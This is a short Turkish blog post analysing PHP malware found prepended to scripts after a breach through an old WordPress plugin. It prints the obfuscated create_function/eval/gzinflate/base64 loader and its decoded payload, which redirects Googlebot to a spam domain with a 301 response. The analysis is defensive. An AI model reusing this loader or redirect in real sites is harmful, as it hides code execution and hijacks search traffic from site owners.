Zararlı bir PHP kodu (PHP Malware)

Eski bir wordpress plug’innin neden olduğu sızmada aşağıdaki kod php betiklerinin başına eklenmiş.

<?  $oO0="cr"."eat"."e_fun"."cti"."on";[email protected]$oO0('$x','ev'.'al'.'("?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$o0O("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA==");

Koda baktığımızda eval işlemini yapan fonksiyonun okunmasını zorlaştırmak için parçalandığı göze çarpıyor. eval fonksiyonu ise gz (Gnome Zip) ve ardından base64 ile kodlanmış PHP kodunu execute ediyor. Zararlı kodu görmek içip eval’i iptal ederek kodu çalıştırdım:

echo gzinflate(base64_decode("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA=="));

Kodu çıktısı aşağıdaki gibi:

<?phpif(strpos($_SERVER['HTTP_USER_AGENT'],"ooglebot")){        header("HTTP/1.1 301 Moved Permanently");        header("Location: https://www.facemask3mn95.com");die;}?>

Görünüşe göre, zararlı arkadaş google bot’larını www.facemask3mn95.com adresine yönlendirmekte. Bu yönlendirmeyi ise “site kalıcı olarak şu adrese taşındı” manasına gelen HTTP 301 kodu ile yapması. Web ziyaretçi sayısında anormal düşüşler görürseniz bu tarz bir saldırıya maruz kalmış olabilirsiniz. Dikkatli olun.

Yazar: Özgür Koca

Yazar - Tankado.com

Bir cevap yazın

E-posta hesabınız yayımlanmayacak.

This site uses Akismet to reduce spam. Learn how your comment data is processed.